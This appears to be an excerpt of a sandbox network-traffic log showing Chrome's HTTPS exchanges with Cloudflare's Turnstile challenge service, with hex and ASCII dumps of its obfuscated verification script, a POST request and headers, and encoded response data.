                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 63 6f 64 65 27 3a 67 57 28 37 39 36 29 2c 27 72 63 56 27 3a 65 4d 5b 67 57 28 35 31 31 29 5d 5b 67 57 28 31 34 38 31 29 5d 7d 2c 27 2a 27 29 29 3a 65 3d 66 5b 67 57 28 31 37 38 33 29 5d 28 69 5b 67 57 28 31 35 36 35 29 5d 2c 69 5b 67 57 28 39 36 34 29 5d 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 37 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 67 58 2c 69 2c 6a 2c 47 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 67 58 3d 67 4a 2c 7b 27 73 4d 5a 49 63 27 3a 66 75 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 45 28 29 7d 2c 27 6c 64 59 73 75 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 28 46 29 7d 2c 27 42 7a 4e 69 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                      Data Ascii: code':gW(796),'rcV':eM[gW(511)][gW(1481)]},'*')):e=f[gW(1783)](i[gW(1565)],i[gW(964)])},g)},eM[gJ(774)]=function(f,g,h,gX,i,j,G,k,l,m,n,o,s,x,B,C,D){i=(gX=gJ,{'sMZIc':function(E){return E()},'ldYsu':function(E,F){return E(F)},'BzNiL':function(E,F,G){retur
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 31 31 29 5d 5b 67 58 28 31 38 37 34 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 67 58 28 36 34 39 29 29 5d 28 29 2c 21 73 29 72 65 74 75 72 6e 3b 78 3d 69 5b 67 58 28 31 33 36 39 29 5d 2c 73 5b 67 58 28 37 34 38 29 5d 28 78 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 67 58 28 31 37 39 36 29 5d 3d 35 65 33 2c 73 5b 67 58 28 31 32 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 67 58 28 31 36 32 37 29 5d 28 67 58 28 31 36 38 33 29 2c 69 5b 67 58 28 31 31 31 38 29 5d 29 2c 42 3d 7b 7d 2c 42 5b 67 58 28 31 37 34 34 29 5d 3d 66 2c 42 5b 67 58 28 31 37 35 39 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 67 58 28 31 32 37 36 29 5d 3d 6b 2c 42 5b 67 58 28 31 30 35 38 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 67 58 28 31 37 36 36 29 5d 28 42 29 2c 44 3d 67 70 5b 67
                                                                                                                                                                                                                                      Data Ascii: 11)][gX(1874)],o=n,s=new eM[(gX(649))](),!s)return;x=i[gX(1369)],s[gX(748)](x,m,!![]),s[gX(1796)]=5e3,s[gX(1282)]=function(){},s[gX(1627)](gX(1683),i[gX(1118)]),B={},B[gX(1744)]=f,B[gX(1759)]=j,B.cc=g,B[gX(1276)]=k,B[gX(1058)]=o,C=JSON[gX(1766)](B),D=gp[g
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 31 30 32 39 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 68 31 28 35 36 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 33 29 7b 68 33 3d 68 31 2c 65 4d 5b 68 33 28 37 37 34 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 69 5b 68 33 28 31 36 38 38 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 31 28 35 36 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 34 2c 6f 29 7b 68 34 3d 68 31 2c 6f 3d 7b 27 76 45 6b 78 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 73 2c 76 2c 78 2c 42 29 7b 72 65 74 75 72 6e 20 73 28 76 2c 78 2c 42 29 7d 7d 2c 68 34 28 31 33 31 38 29 3d 3d 3d 68 34 28 38 39 37 29 3f 28 68 2b 2b 2c 6f 5b 68 34 28 37 31 31 29 5d 28 69 2c 6a 2c 6b 2c 6c 2b 31 29 29 3a 65 4d 5b 68 34 28 36 31 38 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 31 28 31 32 38 34 29 5d 5b 68 31 28 31 35 31 32 29 5d
                                                                                                                                                                                                                                      Data Ascii: 1029)]=h,m=l,eM[h1(561)](function(h3){h3=h1,eM[h3(774)](m,undefined,i[h3(1688)])},10),eM[h1(561)](function(h4,o){h4=h1,o={'vEkxm':function(s,v,x,B){return s(v,x,B)}},h4(1318)===h4(897)?(h++,o[h4(711)](i,j,k,l+1)):eM[h4(618)]()},1e3),eM[h1(1284)][h1(1512)]
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 35 36 39 29 5d 3d 66 4e 2c 66 56 5b 67 4a 28 38 35 33 29 5d 3d 66 4d 2c 66 56 5b 67 4a 28 36 34 33 29 5d 3d 66 62 2c 66 56 5b 67 4a 28 31 37 35 38 29 5d 3d 66 49 2c 66 56 5b 67 4a 28 31 38 30 35 29 5d 3d 66 48 2c 66 56 5b 67 4a 28 31 37 38 38 29 5d 3d 66 32 2c 66 56 5b 67 4a 28 31 38 36 31 29 5d 3d 66 33 2c 66 56 5b 67 4a 28 31 32 39 37 29 5d 3d 66 70 2c 66 56 5b 67 4a 28 31 38 36 36 29 5d 3d 66 72 2c 66 56 5b 67 4a 28 35 33 38 29 5d 3d 66 71 2c 66 56 5b 67 4a 28 31 35 31 34 29 5d 3d 66 42 2c 66 56 5b 67 4a 28 31 31 30 35 29 5d 3d 66 41 2c 66 56 5b 67 4a 28 31 33 33 36 29 5d 3d 66 7a 2c 66 56 5b 67 4a 28 35 30 36 29 5d 3d 66 79 2c 66 56 5b 67 4a 28 31 34 33 32 29 5d 3d 66 6a 2c 66 56 5b 67 4a 28 31 30 31 37 29 5d 3d 66 55 2c 66 56 5b 67 4a 28 31 35 31 36
                                                                                                                                                                                                                                      Data Ascii: 569)]=fN,fV[gJ(853)]=fM,fV[gJ(643)]=fb,fV[gJ(1758)]=fI,fV[gJ(1805)]=fH,fV[gJ(1788)]=f2,fV[gJ(1861)]=f3,fV[gJ(1297)]=fp,fV[gJ(1866)]=fr,fV[gJ(538)]=fq,fV[gJ(1514)]=fB,fV[gJ(1105)]=fA,fV[gJ(1336)]=fz,fV[gJ(506)]=fy,fV[gJ(1432)]=fj,fV[gJ(1017)]=fU,fV[gJ(1516
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 69 3d 3d 3d 68 7d 2c 27 54 4c 64 5a 43 27 3a 69 58 28 31 38 38 39 29 2c 27 4e 57 46 62 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 78 68 47 45 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 6f 6b 68 48 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 67 72 55 42 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 74 4a 4a 4a 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 4c 6b 5a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 58 65 57 71 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                                                                                                                                                                                                                      Data Ascii: i===h},'TLdZC':iX(1889),'NWFbR':function(h,i){return h&i},'xhGEP':function(h,i){return h*i},'okhHI':function(h,i){return h<i},'grUBN':function(h,i){return i&h},'tJJJN':function(h,i){return h(i)},'DLkZT':function(h,i){return i&h},'XeWqq':function(h,i){retu
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 29 5d 5b 6a 31 28 36 39 33 29 5d 5b 6a 31 28 31 38 37 30 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 44 2b 4c 2c 4f 62 6a 65 63 74 5b 6a 31 28 31 32 36 30 29 5d 5b 6a 31 28 36 39 33 29 5d 5b 6a 31 28 31 38 37 30 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 20 66 6f 72 28 4e 3d 64 5b 6a 31 28 31 31 31 32 29 5d 5b 6a 31 28 31 34 31 34 29 5d 28 27 7c 27 29 2c 4f 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4e 5b 4f 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 69 66 28 4f 62 6a 65 63 74 5b 6a 31 28 31 32 36 30 29 5d 5b 6a 31 28 36 39 33 29 5d 5b 6a 31 28 31 38 37 30 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 6a 31 28 31 38 32 35 29 5d 28 32 35 36 2c 44 5b 6a 31 28 31 34 39 37 29 5d 28 30 29 29 29 7b 66 6f 72 28
                                                                                                                                                                                                                                      Data Ascii: )][j1(693)][j1(1870)](B,L)||(B[L]=F++,C[L]=!0),M=D+L,Object[j1(1260)][j1(693)][j1(1870)](B,M))D=M;else for(N=d[j1(1112)][j1(1414)]('|'),O=0;!![];){switch(N[O++]){case'0':if(Object[j1(1260)][j1(693)][j1(1870)](C,D)){if(d[j1(1825)](256,D[j1(1497)](0))){for(
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 2c 48 5b 6a 31 28 34 37 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 50 3d 44 5b 6a 31 28 31 34 39 37 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 49 3c 3c 31 7c 50 26 31 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 6a 31 28 34 37 33 29 5d 28 64 5b 6a 31 28 36 34 32 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 6a 31 28 35 31 39 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 6a 31 28 34 39 33 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 6a 31 28 31 33 39 36 29 5d 28 49 2c 31 29 7c 50 26 31 2e 37 2c 64 5b 6a 31 28 34 39
                                                                                                                                                                                                                                      Data Ascii: ,H[j1(473)](o(I)),I=0):J++,P=0,x++);for(P=D[j1(1497)](0),x=0;16>x;I=I<<1|P&1,j-1==J?(J=0,H[j1(473)](d[j1(642)](o,I)),I=0):J++,P>>=1,x++);}E--,0==E&&(E=Math[j1(519)](2,G),G++),delete C[D]}else for(P=B[D],x=0;d[j1(493)](x,G);I=d[j1(1396)](I,1)|P&1.7,d[j1(49


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.1649744104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1
                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 3141
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      CF-Challenge: vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC3141OUTData Raw: 76 5f 38 66 65 35 63 64 36 35 36 62 36 36 34 33 30 39 3d 72 38 6d 7a 33 7a 75 7a 6a 7a 4d 7a 50 55 77 79 55 77 4f 7a 55 46 64 63 6e 2d 55 41 77 6e 65 6b 77 67 4f 77 74 66 61 74 79 73 6e 77 64 46 6e 63 53 61 73 75 77 4f 77 6d 46 55 58 74 51 77 36 61 77 63 53 49 58 7a 41 53 77 32 7a 55 53 58 55 71 37 35 74 58 77 43 7a 37 37 25 32 62 77 48 61 77 6a 48 77 6d 46 77 78 77 6e 71 24 68 76 66 4e 63 77 58 34 31 35 4b 6d 77 79 77 56 52 59 77 69 43 24 71 52 75 44 36 61 6e 34 73 77 72 59 30 33 73 77 5a 5a 61 52 74 78 71 72 58 75 4d 70 31 78 2d 38 77 73 63 72 4c 30 70 4f 36 71 72 41 65 77 77 70 77 41 58 32 41 7a 77 6c 36 61 77 72 6d 7a 77 69 6e 76 61 69 31 41 44 30 77 74 37 42 6b 75 6a 63 52 46 74 52 77 6e 65 4c 64 45 53 4a 49 72 4c 63 73 7a 38 2d 24 46 77 73 56 6e 58
                                                                                                                                                                                                                                      Data Ascii: v_8fe5cd656b664309=r8mz3zuzjzMzPUwyUwOzUFdcn-UAwnekwgOwtfatysnwdFncSasuwOwmFUXtQw6awcSIXzASw2zUSXUq75tXwCz77%2bwHawjHwmFwxwnq$hvfNcwX415KmwywVRYwiC$qRuD6an4swrY03swZZaRtxqrXuMp1x-8wscrL0pO6qrAewwpwAX2Azwl6awrmzwinvai1AD0wt7BkujcRFtRwneLdESJIrLcsz8-$FwsVnX
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC759INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Tue, 07 Jan 2025 17:52:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 152952
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      cf-chl-gen: sL8mjdPHjZOzIt7cJCh4+rFoM2t4NKKrNApnR52kzK+XJZUOvYs1L1HidpzjIMD+wWEVAEjAuCVl4kxhCp+SjHprRcVvinTh44JAp5Q+Obm3RswLwX4K/G4KdrQ1Tj7HgWFJw3hXromS6hFTzrUCsp6xYAFGsDcdD3JozjQrBCujMU/JeVjxAx4HbM7jTpKvPv4kNQmF+KyNb2SanS5JLd0DQvYTqL42VqsSMEbmeY4LsTZq4/sWNs66973zJ9Miw+K79TR7GWzRLUJQCfjUbDa3gcHw+Mdgnz7shu5BsdrqfmczMy9ND4uitUNp3pm4dAY3MZneI4Zxf8MPqstg5rIP2xS6ppJ76AXSKt7ES4B8gv+ozdf7I3/BWT/qUj2UDYJedSmgKvo+hYfVst5d7q/cx+bgJUCw/cakQpcBV0beb3ThRYfp/h9aSVL4Pq0L6Gyd4VrdxydrJeJoGgxy+uec8v7Ul23WjZFHnLZI6p26hqJejJcfJdaQ0w==$ltAgy8T8zGv7Z4/8
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fe5cd6fba3cc338-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC610INData Raw: 6a 5a 4b 43 5a 59 57 49 57 49 31 61 6e 58 36 67 59 47 4e 32 58 56 2b 69 68 47 6d 71 6c 71 65 4a 5a 6d 6d 4b 6f 37 57 42 67 6d 6d 50 6c 35 53 46 72 58 69 64 6d 59 39 37 66 36 32 77 66 37 71 57 73 61 61 4b 68 38 71 39 68 35 2f 4a 6f 36 44 47 76 5a 4b 55 31 34 36 57 72 35 48 4e 6d 64 62 4e 75 37 79 68 30 4d 54 62 31 36 65 65 35 2b 43 30 74 74 75 39 70 71 62 4b 76 63 72 50 76 73 6e 66 30 75 79 32 37 4e 62 77 75 74 7a 65 33 66 6e 72 37 65 54 55 39 4e 2f 68 33 51 6e 6f 78 63 37 6e 36 67 58 6b 38 41 37 50 33 68 67 57 43 39 58 59 38 74 54 5a 33 50 62 39 37 65 50 35 41 68 37 36 41 69 54 7a 36 78 62 72 4b 65 45 6e 45 65 38 63 49 76 49 54 45 51 34 4d 38 53 34 51 50 6a 30 33 45 7a 4c 34 2f 52 6c 48 46 79 67 47 4b 68 39 42 52 77 55 47 4f 41 64 43 54 79 6c 57 4d 45 34
                                                                                                                                                                                                                                      Data Ascii: jZKCZYWIWI1anX6gYGN2XV+ihGmqlqeJZmmKo7WBgmmPl5SFrXidmY97f62wf7qWsaaKh8q9h5/Jo6DGvZKU146Wr5HNmdbNu7yh0MTb16ee5+C0ttu9pqbKvcrPvsnf0uy27Nbwutze3fnr7eTU9N/h3Qnoxc7n6gXk8A7P3hgWC9XY8tTZ3Pb97eP5Ah76AiTz6xbrKeEnEe8cIvITEQ4M8S4QPj03EzL4/RlHFygGKh9BRwUGOAdCTylWME4
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 38 38 48 30 49 68 4f 55 41 2f 4a 7a 39 47 57 55 67 69 57 55 39 4f 59 57 5a 54 4d 32 6f 34 52 6c 42 76 5a 31 73 33 50 48 78 5a 55 48 4e 32 5a 6e 68 45 69 6e 39 6d 5a 57 64 74 54 30 64 52 66 55 31 39 55 6c 39 79 64 6f 78 30 56 59 52 58 66 70 78 75 59 59 46 38 68 4a 52 77 66 4b 61 6d 64 5a 32 63 67 71 71 48 67 48 78 36 71 35 36 79 73 33 46 7a 6b 35 69 4e 6c 6e 4e 31 6c 37 65 61 73 4c 47 59 64 38 4b 77 74 63 66 44 79 59 66 4a 71 38 79 4e 71 74 4b 68 7a 71 44 43 77 4e 48 58 78 4b 71 71 79 4e 75 72 34 64 69 2f 30 4f 43 79 31 62 57 2b 34 75 71 69 77 4c 75 6e 7a 4f 76 6b 30 65 62 6c 37 72 4f 7a 36 4e 48 4d 77 2f 48 6c 79 4d 6f 42 30 64 76 78 30 39 50 41 32 65 48 7a 39 50 6f 4b 44 73 33 67 43 42 44 49 42 76 48 48 35 2b 51 4a 44 41 73 56 39 4f 2f 58 38 51 77 43 34
                                                                                                                                                                                                                                      Data Ascii: 88H0IhOUA/Jz9GWUgiWU9OYWZTM2o4RlBvZ1s3PHxZUHN2ZnhEin9mZWdtT0dRfU19Ul9ydox0VYRXfpxuYYF8hJRwfKamdZ2cgqqHgHx6q56ys3Fzk5iNlnN1l7easLGYd8KwtcfDyYfJq8yNqtKhzqDCwNHXxKqqyNur4di/0OCy1bW+4uqiwLunzOvk0ebl7rOz6NHMw/HlyMoB0dvx09PA2eHz9PoKDs3gCBDIBvHH5+QJDAsV9O/X8QwC4
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 68 4f 6b 56 6c 62 46 74 50 5a 57 31 79 56 56 5a 45 4c 57 64 49 4f 44 55 30 65 6a 52 4a 53 6c 65 41 63 54 39 68 62 6e 35 67 63 57 74 73 67 31 31 41 65 58 35 66 5a 32 4e 30 66 33 39 53 5a 59 4a 36 64 58 52 76 65 5a 6c 53 69 31 71 56 6f 33 61 6c 6b 34 4e 39 6c 57 70 71 6e 4b 4f 61 73 59 75 6a 62 4a 52 7a 64 71 53 51 72 70 75 36 64 35 47 5a 71 38 43 41 72 33 32 73 78 49 4b 78 6f 37 6d 39 79 34 71 4c 68 34 66 44 78 49 36 46 71 38 4c 41 31 35 4b 6c 7a 35 48 4e 6a 38 36 59 31 35 2b 62 77 37 4b 36 31 73 66 58 78 4d 62 6b 37 4e 2f 63 71 75 69 6a 78 73 58 30 79 2b 76 74 36 2b 72 71 7a 63 72 65 33 37 72 35 41 39 44 52 34 76 7a 37 78 4e 72 7a 41 2f 66 59 34 65 54 68 41 73 37 53 37 4f 6a 72 41 74 63 4d 38 74 72 38 45 68 44 6d 37 78 54 61 45 67 4d 6c 37 52 49 66 4b 4f
                                                                                                                                                                                                                                      Data Ascii: hOkVlbFtPZW1yVVZELWdIODU0ejRJSleAcT9hbn5gcWtsg11AeX5fZ2N0f39SZYJ6dXRveZlSi1qVo3alk4N9lWpqnKOasYujbJRzdqSQrpu6d5GZq8CAr32sxIKxo7m9y4qLh4fDxI6Fq8LA15Klz5HNj86Y15+bw7K61sfXxMbk7N/cquijxsX0y+vt6+rqzcre37r5A9DR4vz7xNrzA/fY4eThAs7S7OjrAtcM8tr8EhDm7xTaEgMl7RIfKO
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 4d 57 52 6d 50 44 34 74 51 44 52 7a 62 32 6c 55 4e 33 5a 70 56 6a 31 7a 53 31 51 2b 67 55 42 67 68 55 70 54 57 6e 31 71 67 34 61 41 5a 6d 70 55 59 49 71 4e 63 32 71 57 63 58 71 57 5a 70 42 74 6f 46 31 34 64 4a 36 6d 6d 49 53 6a 58 47 47 42 68 71 32 63 65 62 4b 63 6c 47 2b 4e 67 6f 43 47 65 61 70 32 68 34 75 4e 70 35 61 55 73 6e 36 77 70 4d 43 43 76 4b 69 6a 68 35 53 57 78 71 69 34 69 35 75 66 6f 5a 58 47 6b 72 43 35 72 4c 66 51 6b 37 48 51 72 35 2b 69 72 39 57 34 75 38 57 37 74 4c 2b 6b 76 64 62 4d 72 4e 32 75 79 73 2f 4b 79 76 4c 51 35 2f 66 6e 36 4e 7a 61 7a 73 6a 36 32 62 6e 77 30 38 4c 32 30 4d 45 45 76 50 55 46 77 39 76 35 36 63 50 6c 30 38 30 4e 38 2f 62 74 46 4d 77 4f 32 78 6b 66 38 53 48 35 41 68 58 76 45 69 62 32 4a 50 55 54 47 79 6f 6d 34 50 73
                                                                                                                                                                                                                                      Data Ascii: MWRmPD4tQDRzb2lUN3ZpVj1zS1Q+gUBghUpTWn1qg4aAZmpUYIqNc2qWcXqWZpBtoF14dJ6mmISjXGGBhq2cebKclG+NgoCGeap2h4uNp5aUsn6wpMCCvKijh5SWxqi4i5ufoZXGkrC5rLfQk7HQr5+ir9W4u8W7tL+kvdbMrN2uys/KyvLQ5/fn6Nzazsj62bnw08L20MEEvPUFw9v56cPl080N8/btFMwO2xkf8SH5AhXvEib2JPUTGyom4Ps
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 32 5a 30 65 6c 70 37 66 54 31 54 64 57 77 2f 63 31 4e 58 59 31 52 69 63 30 64 72 61 31 56 69 67 6b 78 61 5a 49 74 4c 62 59 4e 75 56 56 61 4c 56 59 74 5a 6a 4a 31 71 58 33 65 44 6f 6e 79 46 67 6d 47 6d 70 33 52 34 65 48 35 39 5a 6f 43 6c 69 35 2b 52 6a 49 69 68 71 34 65 70 75 6e 4f 34 6d 62 72 41 6e 35 43 36 73 62 74 35 79 4c 32 41 6f 73 48 4e 6e 73 7a 48 71 70 71 64 6c 4e 61 2b 79 4c 4f 56 79 71 79 37 78 74 44 58 72 39 44 4d 72 37 53 77 6e 2b 48 67 75 70 79 31 6f 73 6a 4b 70 73 43 6f 78 2f 54 55 73 63 7a 44 39 39 4c 55 74 2b 62 77 30 64 37 74 75 64 4b 38 30 77 48 43 7a 38 44 30 77 77 77 46 36 67 54 59 33 73 73 4e 30 65 67 42 34 78 63 59 41 74 58 37 35 52 4c 65 41 52 33 37 41 66 73 66 48 2b 49 45 39 75 44 63 33 53 55 4d 43 52 6f 4c 36 7a 4d 49 36 77 6e 73
                                                                                                                                                                                                                                      Data Ascii: 2Z0elp7fT1TdWw/c1NXY1Ric0dra1VigkxaZItLbYNuVVaLVYtZjJ1qX3eDonyFgmGmp3R4eH59ZoCli5+RjIihq4epunO4mbrAn5C6sbt5yL2AosHNnszHqpqdlNa+yLOVyqy7xtDXr9DMr7Swn+Hgupy1osjKpsCox/TUsczD99LUt+bw0d7tudK80wHCz8D0wwwF6gTY3ssN0egB4xcYAtX75RLeAR37AfsfH+IE9uDc3SUMCRoL6zMI6wns
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 68 33 4e 7a 63 34 56 6e 39 7a 62 33 70 48 50 33 4a 2f 62 59 6c 76 58 45 78 2b 69 6b 78 4d 67 58 64 32 59 59 61 43 6a 33 57 51 6c 6c 79 58 67 59 4a 78 59 4a 71 50 6a 34 57 61 69 33 6c 31 6d 6f 65 6a 62 4a 2b 53 67 6f 57 76 6e 36 2b 7a 6d 62 52 31 68 59 36 64 6e 62 69 77 74 71 79 53 74 63 43 6b 73 4d 47 6e 77 37 69 39 78 49 79 6d 77 73 69 51 7a 63 54 50 7a 4d 53 5a 74 38 36 6d 72 4b 66 56 71 37 2b 78 72 62 54 57 6f 37 6d 6f 78 65 58 48 74 75 37 4e 78 4f 71 70 38 75 4c 50 34 2b 33 69 74 75 61 7a 38 38 62 57 39 4e 72 39 2f 75 72 54 34 76 62 30 2f 75 51 41 78 2b 6a 71 41 67 33 47 78 74 72 73 79 73 77 4c 46 74 49 4f 79 2f 50 78 2f 65 76 79 41 42 4c 32 39 42 63 6c 41 4e 77 6f 43 52 7a 38 36 65 6e 32 37 67 6b 53 48 53 34 76 49 41 77 30 47 53 73 43 45 42 6b 37 4d
                                                                                                                                                                                                                                      Data Ascii: h3Nzc4Vn9zb3pHP3J/bYlvXEx+ikxMgXd2YYaCj3WQllyXgYJxYJqPj4Wai3l1moejbJ+SgoWvn6+zmbR1hY6dnbiwtqyStcCksMGnw7i9xIymwsiQzcTPzMSZt86mrKfVq7+xrbTWo7moxeXHtu7NxOqp8uLP4+3ituaz88bW9Nr9/urT4vb0/uQAx+jqAg3GxtrsyswLFtIOy/Px/evyABL29BclANwoCRz86en27gkSHS4vIAw0GSsCEBk7M
                                                                                                                                                                                                                                      2025-01-07 17:52:35 UTC1369INData Raw: 4f 68 32 61 44 5a 6c 65 46 65 34 6c 76 6b 48 47 4f 67 48 4f 51 58 5a 57 47 67 4a 65 4e 62 5a 4a 62 62 6f 78 34 6f 57 46 77 68 59 4f 66 66 61 4b 58 6d 4a 69 48 6f 6d 32 4e 6e 59 4b 48 73 48 79 6f 6c 70 2b 77 73 71 36 36 70 6f 5a 36 71 4b 76 43 66 70 75 33 6f 35 75 37 6c 38 4f 45 71 70 61 39 79 34 65 69 6b 5a 4c 52 76 37 32 70 77 4c 54 4a 77 71 2f 54 33 61 66 48 34 64 6a 52 33 61 7a 68 33 4b 4c 67 75 64 6d 6b 76 4e 6a 59 7a 4d 44 43 37 4f 72 49 33 64 62 6b 31 75 4f 7a 36 4f 76 56 38 2f 79 37 32 4d 2f 61 2b 66 72 6c 77 38 4d 41 35 63 53 2b 37 4d 30 4e 7a 4d 50 39 38 67 66 51 42 65 66 31 79 2b 55 64 2b 52 76 77 41 4e 30 4b 48 41 77 6b 45 52 72 79 2b 66 59 4d 42 78 6f 76 45 4f 6f 6d 45 43 34 77 41 67 33 30 4c 41 55 4b 43 76 6f 65 4d 66 30 71 48 43 7a 38 48 78
                                                                                                                                                                                                                                      Data Ascii: Oh2aDZleFe4lvkHGOgHOQXZWGgJeNbZJbbox4oWFwhYOffaKXmJiHom2NnYKHsHyolp+wsq66poZ6qKvCfpu3o5u7l8OEqpa9y4eikZLRv72pwLTJwq/T3afH4djR3azh3KLgudmkvNjYzMDC7OrI3dbk1uOz6OvV8/y72M/a+frlw8MA5cS+7M0NzMP98gfQBef1y+Ud+RvwAN0KHAwkERry+fYMBxovEOomEC4wAg30LAUKCvoeMf0qHCz8Hx
